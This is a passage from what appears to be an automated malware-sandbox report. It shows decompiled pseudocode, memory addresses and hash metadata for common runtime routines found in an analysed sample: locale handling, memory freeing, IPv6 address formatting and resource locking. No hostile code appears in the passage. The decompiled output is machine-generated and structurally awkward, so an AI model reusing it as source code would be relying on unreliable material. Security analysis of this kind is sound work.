								_t15 = E009B7D73(__ebx, __edx, 1, _t42, __fp0,  *_t42, _a4, _a8);
								_push( *((intOrPtr*)(_t42 + 4)));
								__eflags = _t15;
								if(__eflags == 0) {
									L14:
									E009B2248();
									E009B4248( *_t42);
									E009B40EE( *_t42);
									E009B2248(_t42);
									_t42 = 0;
									L16:
									return _t42;
								}
								_push( *((intOrPtr*)( *_t42 + 4)));
								_t22 = E009B48E9(__edx, 1, __eflags);
								__eflags = _t22;
								if(_t22 == 0) {
									 *((intOrPtr*)( *((intOrPtr*)(_t42 + 4)))) = 1;
									goto L16;
								}
								_push( *((intOrPtr*)(_t42 + 4)));
								goto L14;
							}
							E009B2248( *_t42);
							E009B2248(_t42);
							L8:
							goto L3;
						}
						E009B2248(_t42);
						goto L8;
					}
					L3:
					 *((intOrPtr*)(E009AF100())) = 0xc;
					goto L4;
				}
			}











                                                          0x009b797c
                                                          0x009b79a2
                                                          0x00000000
                                                          0x009b7984
                                                          0x009b798f
                                                          0x009b7995
                                                          0x009b79ae
                                                          0x009b79b3
                                                          0x009b79b7
                                                          0x009b79b9
                                                          0x009b79ca
                                                          0x009b79cf
                                                          0x009b79d4
                                                          0x009b79d6
                                                          0x009b79ef
                                                          0x009b79fc
                                                          0x009b7a04
                                                          0x009b7a07
                                                          0x009b7a09
                                                          0x009b7a1e
                                                          0x009b7a1e
                                                          0x009b7a25
                                                          0x009b7a2c
                                                          0x009b7a32
                                                          0x009b7a3a
                                                          0x009b7a43
                                                          0x00000000
                                                          0x009b7a43
                                                          0x009b7a0d
                                                          0x009b7a10
                                                          0x009b7a17
                                                          0x009b7a19
                                                          0x009b7a41
                                                          0x00000000
                                                          0x009b7a41
                                                          0x009b7a1b
                                                          0x00000000
                                                          0x009b7a1b
                                                          0x009b79da
                                                          0x009b79e0
                                                          0x009b79c1
                                                          0x00000000
                                                          0x009b79c1
                                                          0x009b79bc
                                                          0x00000000
                                                          0x009b79bc
                                                          0x009b7997
                                                          0x009b799c
                                                          0x00000000
                                                          0x009b799c

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                          • String ID:
                                                          • API String ID: 1503006713-0
                                                          • Opcode ID: 044e6a698d42caf234a8125fa7611d2aaad340f55c744e953543d501a151e4f2
                                                          • Instruction ID: 6dfbdb7a9998d7dbdf7fd9c75472369038a7ed211609ed7ea2d8b9231477365b
                                                          • Opcode Fuzzy Hash: 044e6a698d42caf234a8125fa7611d2aaad340f55c744e953543d501a151e4f2
                                                          • Instruction Fuzzy Hash: 0521053514C605AEEB253FE4DE02FDABBE9DFC1770B204A2DF554950A2EA3199009791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009B7A4A Relevance: 18.1, APIs: 12, Instructions: 131COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          C-Code - Quality: 84%
                                                          			E009B7A4A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4, signed int _a8, char _a12) {
				signed int _v8;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				void* _t38;
				signed int _t45;
				signed int _t60;
				intOrPtr _t77;
				void* _t80;
				intOrPtr* _t82;
				signed int _t83;
				signed int _t86;
				intOrPtr _t88;
				void* _t92;
				void* _t98;

				_t98 = __fp0;
				_t80 = __edx;
				_push(__ebx);
				_push(__esi);
				_t86 = 0;
				if(_a12 <= 0) {
					L5:
					return _t38;
				} else {
					_push(__edi);
					_t82 =  &_a12;
					while(1) {
						_t82 = _t82 + 4;
						_t38 = E009B56BB(_a4, _a8,  *_t82);
						_t92 = _t92 + 0xc;
						if(_t38 != 0) {
							break;
						}
						_t86 = _t86 + 1;
						if(_t86 < _a12) {
							continue;
						} else {
							goto L5;
						}
						goto L20;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E009AEB49(0, _t80);
					asm("int3");
					_push(0x14);
					_push(0x9cc560);
					E009AF1E0(0, _t82, _t86);
					_t66 = 0;
					_v32 = 0;
					__eflags = _a4 - 5;
					if(_a4 <= 5) {
						_t88 = E009B0595();
						_v36 = _t88;
						E009B42E8(0, _t80, _t82, _t88, __eflags);
						 *(_t88 + 0x70) =  *(_t88 + 0x70) | 0x00000010;
						_v8 = _v8 & 0;
						_t83 = E009B2280(0xb8, 1);
						_v40 = _t83;
						__eflags = _t83;
						if(_t83 != 0) {
							E009B20A9(0xc);
							_v8 = 1;
							E009B7488(_t83,  *((intOrPtr*)(_t88 + 0x6c)));
							_v8 = _v8 & 0x00000000;
							E009B7BBF();
							_t66 = E009B7D73(0, _t80, _t83, _t88, _t98, _t83, _a4, _a8);
							_v32 = _t66;
							__eflags = _t66;
							if(_t66 == 0) {
								E009B4248(_t83);
								_t43 = E009B40EE(_t83);
							} else {
								__eflags = _a8;
								if(_a8 != 0) {
									_t60 = E009BDB28(_a8, 0x9ce694);
									__eflags = _t60;
									if(_t60 != 0) {
										 *0x9d0050 = 1;
									}
								}
								E009B20A9(0xc);
								_v8 = 2;
								_t25 = _t88 + 0x6c; // 0x6c
								E009B4368(_t25, _t83);
								E009B4248(_t83);
								__eflags =  *(_t88 + 0x70) & 0x00000002;
								if(( *(_t88 + 0x70) & 0x00000002) == 0) {
									__eflags =  *0x9cee10 & 0x00000001;
									if(( *0x9cee10 & 0x00000001) == 0) {
										E009B4368(0x9ce7fc,  *((intOrPtr*)(_t88 + 0x6c)));
										_t77 =  *0x9ce7fc; // 0x9ce800
										_t32 = _t77 + 0x84; // 0x9cee28
										 *0x9cee20 =  *_t32;
										_t33 = _t77 + 0x90; // 0x9c8760
										 *0x9cee7c =  *_t33;
										_t34 = _t77 + 0x74; // 0x1
										 *0x9ce690 =  *_t34;
									}
								}
								_v8 = _v8 & 0x00000000;
								_t43 = E009B7BCE();
							}
						}
						_v8 = 0xfffffffe;
						E009B7C01(_t43, _t88);
						_t45 = _t66;
					} else {
						 *((intOrPtr*)(E009AF100())) = 0x16;
						E009AEB1E();
						_t45 = 0;
					}
					return E009AF225(_t45);
				}
				L20:
			}


















                                                          0x009b7a4a
                                                          0x009b7a4a
                                                          0x009b7a4d
                                                          0x009b7a50
                                                          0x009b7a51
                                                          0x009b7a56
                                                          0x009b7a7a
                                                          0x009b7a7d
                                                          0x009b7a58
                                                          0x009b7a58
                                                          0x009b7a59
                                                          0x009b7a5c
                                                          0x009b7a5c
                                                          0x009b7a67
                                                          0x009b7a6c
                                                          0x009b7a71
                                                          0x00000000
                                                          0x00000000
                                                          0x009b7a73
                                                          0x009b7a77
                                                          0x00000000
                                                          0x009b7a79
                                                          0x00000000
                                                          0x009b7a79
                                                          0x00000000
                                                          0x009b7a77
                                                          0x009b7a7e
                                                          0x009b7a7f
                                                          0x009b7a80
                                                          0x009b7a81
                                                          0x009b7a82
                                                          0x009b7a83
                                                          0x009b7a88
                                                          0x009b7a89
                                                          0x009b7a8b
                                                          0x009b7a90
                                                          0x009b7a95
                                                          0x009b7a97
                                                          0x009b7a9a
                                                          0x009b7a9e
                                                          0x009b7abc
                                                          0x009b7abe
                                                          0x009b7ac1
                                                          0x009b7ac6
                                                          0x009b7aca
                                                          0x009b7adb
                                                          0x009b7add
                                                          0x009b7ae0
                                                          0x009b7ae2
                                                          0x009b7aea
                                                          0x009b7af0
                                                          0x009b7afb
                                                          0x009b7b02
                                                          0x009b7b06
                                                          0x009b7b1a
                                                          0x009b7b1c
                                                          0x009b7b1f
                                                          0x009b7b21
                                                          0x009b7bda
                                                          0x009b7be0
                                                          0x009b7b27
                                                          0x009b7b27
                                                          0x009b7b2b
                                                          0x009b7b35
                                                          0x009b7b3c
                                                          0x009b7b3e
                                                          0x009b7b40
                                                          0x009b7b40
                                                          0x009b7b3e
                                                          0x009b7b4c
                                                          0x009b7b52
                                                          0x009b7b59
                                                          0x009b7b5e
                                                          0x009b7b64
                                                          0x009b7b6c
                                                          0x009b7b70
                                                          0x009b7b72
                                                          0x009b7b79
                                                          0x009b7b83
                                                          0x009b7b8a
                                                          0x009b7b90
                                                          0x009b7b96
                                                          0x009b7b9b
                                                          0x009b7ba1
                                                          0x009b7ba6
                                                          0x009b7ba9
                                                          0x009b7ba9
                                                          0x009b7b79
                                                          0x009b7bae
                                                          0x009b7bb2
                                                          0x009b7bb2
                                                          0x009b7b21
                                                          0x009b7be7
                                                          0x009b7bee
                                                          0x009b7bf3
                                                          0x009b7aa0
                                                          0x009b7aa5
                                                          0x009b7aab
                                                          0x009b7ab0
                                                          0x009b7ab0
                                                          0x009b7bfa
                                                          0x009b7bfa
                                                          0x00000000

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson__wsetlocale_nolock_wcscmp
                                                          • String ID:
                                                          • API String ID: 2762079118-0
                                                          • Opcode ID: da5503bce7a389e2851da6700a825f1d062d8528cc12023aea641eb43bb90b57
                                                          • Instruction ID: 2b4a53e4bd333c76b9562a8cfe9133d025f0b7c5dce6ab881c47875f43153c8e
                                                          • Opcode Fuzzy Hash: da5503bce7a389e2851da6700a825f1d062d8528cc12023aea641eb43bb90b57
                                                          • Instruction Fuzzy Hash: E141D132908309AFDB10AFE4DA42BDDB7E8EFC4334F10862DF91596182DB759641EB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009A513D Relevance: 18.1, APIs: 12, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 74%
                                                          			E009A513D(void* __eax, void* __ebx) {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t7;
				intOrPtr _t8;
				void* _t13;
				void* _t23;
				intOrPtr* _t25;
				signed int _t26;
				signed int _t27;

				_t13 = __ebx;
				__imp__DecodePointer( *0x9d0110);
				_t25 =  *0x9cf20c; // 0x0
				_t23 = __eax;
				if(_t25 != 0) {
					while( *_t25 != 0) {
						E009B2248( *_t25);
						_t25 = _t25 + 4;
						if(_t25 != 0) {
							continue;
						}
						break;
					}
					_t25 =  *0x9cf20c; // 0x0
				}
				_push(_t13);
				E009B2248(_t25);
				_t26 =  *0x9cf208; // 0x0
				 *0x9cf20c = 0;
				if(_t26 != 0) {
					while( *_t26 != 0) {
						E009B2248( *_t26);
						_t26 = _t26 + 4;
						if(_t26 != 0) {
							continue;
						}
						break;
					}
					_t26 =  *0x9cf208; // 0x0
				}
				E009B2248(_t26);
				 *0x9cf208 = 0;
				E009B2248( *0x9cf204);
				_t5 = E009B2248( *0x9cf200);
				_t27 = _t26 | 0xffffffff;
				 *0x9cf204 = 0;
				 *0x9cf200 = 0;
				if(_t23 != _t27 &&  *0x9d0110 != 0) {
					_t5 = E009B2248(_t23);
				}
				__imp__EncodePointer(_t27);
				 *0x9d0110 = _t5;
				_t6 =  *0x9cfd10; // 0x0
				if(_t6 != 0) {
					E009B2248(_t6);
					 *0x9cfd10 = 0;
				}
				_t7 =  *0x9cfd14; // 0x0
				if(_t7 != 0) {
					E009B2248(_t7);
					 *0x9cfd14 = 0;
				}
				_t8 =  *0x9cecec; // 0x9ceac8
				asm("lock xadd [eax], esi");
				if(_t27 == 1) {
					_t8 =  *0x9cecec; // 0x9ceac8
					if(_t8 != 0x9ceac8) {
						_t8 = E009B2248(_t8);
						 *0x9cecec = 0x9ceac8;
					}
				}
				return _t8;
			}












                                                          0x009a513d
                                                          0x009b091b
                                                          0x009b0921
                                                          0x009b0927
                                                          0x009b092b
                                                          0x009b092d
                                                          0x009b0934
                                                          0x009b093a
                                                          0x009b093d
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x009b093d
                                                          0x009b093f
                                                          0x009b093f
                                                          0x009b0945
                                                          0x009b0947
                                                          0x009b094c
                                                          0x009b0954
                                                          0x009b095d
                                                          0x009b095f
                                                          0x009b0965
                                                          0x009b096b
                                                          0x009b096e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x009b096e
                                                          0x009b0970
                                                          0x009b0970
                                                          0x009b0977
                                                          0x009b0982
                                                          0x009b0988
                                                          0x009b0993
                                                          0x009b0998
                                                          0x009b099b
                                                          0x009b09a4
                                                          0x009b09ac
                                                          0x009b09b7
                                                          0x009b09bc
                                                          0x009b09be
                                                          0x009b09c4
                                                          0x009b09c9
                                                          0x009b09d0
                                                          0x009b09d3
                                                          0x009b09d9
                                                          0x009b09d9
                                                          0x009b09df
                                                          0x009b09e6
                                                          0x009b09e9
                                                          0x009b09ef
                                                          0x009b09ef
                                                          0x009b09f5
                                                          0x009b09fa
                                                          0x009b0a00
                                                          0x009b0a02
                                                          0x009b0a0e
                                                          0x009b0a11
                                                          0x009b0a17
                                                          0x009b0a17
                                                          0x009b0a0e
                                                          0x009b0a1f

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 3064303923-0
                                                          • Opcode ID: 74ccf8ab6e0153cd3e75a333bd0dd067a2f7325259ecf5a7f5418adf0dd7ded3
                                                          • Instruction ID: 3cdadf9e88027997c62150ad835ac5599d8a008d718cf249fdcea32ed51fca6b
                                                          • Opcode Fuzzy Hash: 74ccf8ab6e0153cd3e75a333bd0dd067a2f7325259ecf5a7f5418adf0dd7ded3
                                                          • Instruction Fuzzy Hash: AD21B137D692118BE725AF14FE50E9A7369F781730354063EF93493275CB346C40AB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00A413CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 38%
                                                          			E00A413CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = L00A37707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0xa02926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = L00A37707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0xa09cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + L00A37707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + L00A37707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = L00A37707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = L00A37707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                          0x00a413d5
                                                          0x00a413d9
                                                          0x00a413dc
                                                          0x00a413de
                                                          0x00a413e1
                                                          0x00a413e8
                                                          0x00a413ee
                                                          0x00a6e8fd
                                                          0x00000000
                                                          0x00a6e921
                                                          0x00a6e921
                                                          0x00a6e928
                                                          0x00a6e982
                                                          0x00a6e98a
                                                          0x00000000
                                                          0x00a6e99a
                                                          0x00a6e99e
                                                          0x00a6e9a3
                                                          0x00a6e9a8
                                                          0x00a6e9b9
                                                          0x00a6e978
                                                          0x00000000
                                                          0x00a6e978
                                                          0x00a6e98a
                                                          0x00a6e92a
                                                          0x00a6e931
                                                          0x00a6e944
                                                          0x00a6e944
                                                          0x00a6e950
                                                          0x00a6e954
                                                          0x00a6e959
                                                          0x00a6e95e
                                                          0x00a6e963
                                                          0x00a6e970
                                                          0x00000000
                                                          0x00a6e975
                                                          0x00a6e93b
                                                          0x00a6e980
                                                          0x00000000
                                                          0x00a6e980
                                                          0x00a6e942
                                                          0x00a6e94b
                                                          0x00000000
                                                          0x00a6e94b
                                                          0x00000000
                                                          0x00a6e942
                                                          0x00a413f4
                                                          0x00a413f4
                                                          0x00a413f9
                                                          0x00a413fc
                                                          0x00a413ff
                                                          0x00a41406
                                                          0x00a6e9cc
                                                          0x00a6e9d2
                                                          0x00a6e9d2
                                                          0x00a6e9cc
                                                          0x00a4140c
                                                          0x00a41411
                                                          0x00a41431
                                                          0x00a4143a
                                                          0x00a4143c
                                                          0x00a4143f
                                                          0x00a4143f
                                                          0x00a41442
                                                          0x00a41447
                                                          0x00a414a8
                                                          0x00a414ac
                                                          0x00a6e9e2
                                                          0x00a6e9e7
                                                          0x00a6e9ec
                                                          0x00a6ea05
                                                          0x00a6ea05
                                                          0x00000000
                                                          0x00a41449
                                                          0x00000000
                                                          0x00a41449
                                                          0x00a4144c
                                                          0x00a41459
                                                          0x00a41462
                                                          0x00a41469
                                                          0x00a4146a
                                                          0x00a41470
                                                          0x00a41473
                                                          0x00a41476
                                                          0x00a41476
                                                          0x00a41490
                                                          0x00a41495
                                                          0x00a4138e
                                                          0x00a41390
                                                          0x00a41397
                                                          0x00a41398
                                                          0x00a41399
                                                          0x00a413a1
                                                          0x00a413a4
                                                          0x00a413a4
                                                          0x00a41498
                                                          0x00a4149c
                                                          0x00a4149f
                                                          0x00a414a2
                                                          0x00000000
                                                          0x00000000
                                                          0x00a414a4
                                                          0x00000000
                                                          0x00a414a4
                                                          0x00a41413
                                                          0x00a41415
                                                          0x00a41416
                                                          0x00a41419
                                                          0x00a4141c
                                                          0x00a41422
                                                          0x00a413b7
                                                          0x00a413bc
                                                          0x00a413bf
                                                          0x00a413bf
                                                          0x00a413c2
                                                          0x00a41424
                                                          0x00a41424
                                                          0x00a41424
                                                          0x00a41427
                                                          0x00a4142b
                                                          0x00a4142c
                                                          0x00a4142c
                                                          0x00a4142c
                                                          0x00000000
                                                          0x00a4141c
                                                          0x00a41411

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: b16b0bea5005bea69a3bf7b0a6fb287ac22d3ffac5c6352282c5918b8a66998c
                                                          • Instruction ID: e1aa2b2cf0698a4e7c588b1044186aa14fb124dc3b19fd814b75ede9394aa804
                                                          • Opcode Fuzzy Hash: b16b0bea5005bea69a3bf7b0a6fb287ac22d3ffac5c6352282c5918b8a66998c
                                                          • Instruction Fuzzy Hash: 766127B9904655AACB34DF99C8808BFBBF5EFD4300B14C52DF5D647581D374AA80DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00A40554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 50%
                                                          			E00A40554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00ae01c0;
									_push(_t144);
									_push(0);
									_t51 = L009FF8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = L00A44FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									L00A53F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									L00A53F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E00A8217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									L00A53F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									L00A43915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00ae01c0;
												_push(_t138);
												_push(0);
												_t58 = L009FF8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = L00A44FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												L00A53F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												L00A53F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E00A8217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												L00A53F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												L00A43915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00A25384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
